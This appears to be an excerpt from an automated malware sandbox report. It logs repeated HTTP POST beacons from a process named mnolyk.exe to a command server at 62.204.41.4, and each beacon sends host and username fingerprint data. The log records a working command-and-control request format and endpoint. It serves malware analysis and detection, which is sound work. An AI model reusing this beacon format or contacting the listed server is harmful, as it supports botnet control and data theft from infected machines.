                            Feb 8, 2023 17:39:14.324162006 CET | 568 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:14 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            38 | 192.168.2.4 | 49733 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:36.045612097 CET | 227 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:36.110603094 CET | 227 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            380 | 192.168.2.4 | 50075 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:14.493858099 CET | 569 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:14.559590101 CET | 569 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:14 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            381 | 192.168.2.4 | 50076 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:14.728959084 CET | 570 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:14.790911913 CET | 570 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:14 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            382 | 192.168.2.4 | 50077 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:14.979084969 CET | 571 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:15.045377970 CET | 571 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            383 | 192.168.2.4 | 50078 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:15.231604099 CET | 572 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:15.295681000 CET | 572 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            384 | 192.168.2.4 | 50079 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:15.474750996 CET | 572 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:15.537436008 CET | 573 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            385 | 192.168.2.4 | 50080 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:15.721318960 CET | 574 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:15.783492088 CET | 574 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            386 | 192.168.2.4 | 50081 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:15.969624043 CET | 575 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:16.033631086 CET | 575 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            387 | 192.168.2.4 | 50082 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:16.214185953 CET | 576 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:16.280766010 CET | 576 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:16 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            388 | 192.168.2.4 | 50083 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:16.450190067 CET | 577 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:16.513186932 CET | 577 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:16 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            389 | 192.168.2.4 | 50084 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:16.684237003 CET | 578 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:16.747688055 CET | 578 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:16 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            39 | 192.168.2.4 | 49734 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:36.292012930 CET | 228 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:36.357598066 CET | 228 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            390 | 192.168.2.4 | 50085 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:16.942706108 CET | 579 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:17.006316900 CET | 579 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:16 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            391 | 192.168.2.4 | 50086 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:17.186332941 CET | 580 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:17.251060963 CET | 580 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            392 | 192.168.2.4 | 50087 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:17.420202971 CET | 581 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:17.484596014 CET | 581 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            393 | 192.168.2.4 | 50088 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:17.657423973 CET | 582 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:17.721311092 CET | 582 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            394 | 192.168.2.4 | 50089 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:17.910351038 CET | 583 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:17.974165916 CET | 583 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            395 | 192.168.2.4 | 50090 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:18.150814056 CET | 584 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:18.215178967 CET | 584 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            396 | 192.168.2.4 | 50091 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:18.399399042 CET | 585 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:18.464189053 CET | 585 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            397 | 192.168.2.4 | 50092 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:18.634985924 CET | 586 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:18.697040081 CET | 586 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


